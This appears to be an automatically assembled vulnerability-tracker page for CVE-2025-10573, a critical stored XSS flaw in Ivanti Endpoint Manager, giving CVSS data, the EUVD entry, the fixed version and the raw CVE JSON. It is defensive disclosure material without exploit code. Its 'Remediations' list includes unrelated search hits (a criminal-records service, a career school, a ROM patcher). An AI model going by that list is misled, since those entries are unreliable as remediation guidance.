CVE-2025-10573
📛 CVE Title
CVE-2025-10573
Description
Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required.
Overview
- State
- PUBLISHED
- Assigner (CNA)
- ivanti
- CVSS severity
- CRITICAL
- CVSS score
- 9.6 / 10
- CVSS vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H- Effective score
- 9.6 / 10 CRITICAL source: CNA overview
- CWE(s)
-
CWE-79 - Reserved
- 2025-09-16
- Published
- 2025-12-09 16:55 UTC
- Last updated
- 2026-02-26 17:57 UTC
- Source
- https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2025/10xxx/CVE-2025-10573.json
- Linked Threat
- CVE-2025-10573 — CVE-2025-10573
European Union Vulnerability Database ENISA EUVD
ENISA's official EU repository for curated vulnerability intelligence. Carries a separate identifier (EUVD-YYYY-NNNN) and frequently exposes an earlier-published description + CVSS than NVD does.
- EUVD ID
-
EUVD-2025-202300 - Assigner
- ivanti
- Published
- Dec 9, 2025, 3:55:23 PM
- Updated
- Feb 26, 2026, 4:57:06 PM
- EUVD base score (CVSS 3.1)
-
9.6 / 10
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - EUVD-reported EPSS
- 0.0600
- Vendors
- Ivanti
- Products
-
Endpoint Manager (patch: 2024 SU4 SR1)
- Aliases
-
GHSA-vc8q-w37r-fmjc
ENISA description: Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required.
Affected products (1)
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| Ivanti | Endpoint Manager |
2024 SU4 SR1 (unaffected)
|
— |
Remediations (10)
Remediations are stored against the linked Threat row; the list below is deduplicated across both pages.
-
web:censys.com
Vulnerability Description CVE-2025-10573 is a critical (CVSS 9.6) stored Cross-Site Scripting (XSS) vulnerability that allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. This can lead to session hijacking, privilege escalation, and potential compromise of the Ivanti Endpoint Manager (EPM) interface. This vulnerability affects ...
2026-05-22 11:37 UTC -
web:epatch.pa.gov
Why does PATCH exist? Its purpose is to better enable the public to obtain criminal history record checks. The repository was created and is maintained in accordance with Pennsylvania's Criminal History Information Act contained in Chapter 91 of Title 18, Crimes Code. This Act also directs the Pennsylvania State Police (PSP) to disseminate criminal history data to criminal justice agencies ...
2026-05-22 11:37 UTC -
web:nvd.nist.gov
An official website of the United States government Here's how you know
2026-05-22 11:37 UTC -
web:thehackernews.com
Vendors fix critical flaws across Fortinet, Ivanti, and SAP to prevent authentication bypass and remote code execution.
2026-05-22 11:37 UTC -
web:www.bleepingcomputer.com
American IT software company Ivanti warned customers today to patch a newly disclosed vulnerability in its Endpoint Manager (EPM) solution that could allow attackers to execute code remotely.
2026-05-22 11:37 UTC -
web:www.cve.org
At cve .org, we provide the authoritative reference method for publicly known information-security vulnerabilities and exposures
2026-05-22 11:37 UTC -
web:www.oracle.com
Critical Security Patch Updates Critical Security Patch Updates provide security patches for supported Oracle on-premises products. A Critical Security Patch Update provides targeted, high-priority security fixes in a smaller, more focused format, making them easier to apply with minimal disruption.
2026-05-22 11:37 UTC -
web:www.patchcareerinstitute.com
P.A.T.C.H . Career Institute's mission is to provide quality training to students in the medical and vocational field. Our primary focus is to provide affordable, and competitive educational training for low to moderate income students.
2026-05-22 11:37 UTC -
web:www.rapid7.com
Due to the unauthenticated nature of this vulnerability, customers are recommended to patch affected instances as soon as possible. Product description Ivanti EPM is endpoint management software used by many organizations for remote administration, vulnerability scanning, and compliance management of user endpoints, among other use cases.
2026-05-22 11:37 UTC -
web:www.romhacking.net
Add temporary header() Patch file: Apply patch Original ROM: Modified ROM: Patch type: IPS BPS PPF UPS APS RUP Create patch Settings Rom Patcher JS v2.9 by Marc Robledo See on GitHub Donate Language English Français Deutsch Italiano Español Nederlands Svenska Català Valencià Português Brasileiro Russian 日本語 中文(简体) 中文 ...
2026-05-22 11:37 UTC
Vendor references (1)
References embedded in the original CVE record by the assigning CNA.
Web references (1)
DuckDuckGo results ranked by threat-intel / vendor advisory domains. Generated by the 🔎 Find references (web) button above — same flow as the Remediations search.
- https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 rapid7:forums.ivanti.com
AI Forensic Analysis
Only Available for Registered Users. Sign in to view.
Raw JSON
The full cvelistV5 record. Download as CVE-2025-10573.json.
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-10573",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-10T04:57:22.470061Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-02-26T16:57:06.042Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "affected",
"product": "Endpoint Manager",
"vendor": "Ivanti",
"versions": [
{
"status": "unaffected",
"version": "2024 SU4 SR1",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": " Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required. <br>"
}
],
"value": "Stored XSS in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary JavaScript in the context of an administrator session. User interaction is required."
}
],
"impacts": [
{
"capecId": "CAPEC-592",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-592 Stored XSS"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting')",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-09T15:55:23.422Z",
"orgId": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75",
"shortName": "ivanti"
},
"references": [
{
"url": "https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024"
}
],
"source": {
"discovery": "UNKNOWN"
},
"x_generator": {
"engine": "Vulnogram 0.5.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "3c1d8aa1-5a33-4ea4-8992-aadd6440af75",
"assignerShortName": "ivanti",
"cveId": "CVE-2025-10573",
"datePublished": "2025-12-09T15:55:23.422Z",
"dateReserved": "2025-09-16T18:01:53.783Z",
"dateUpdated": "2026-02-26T16:57:06.042Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}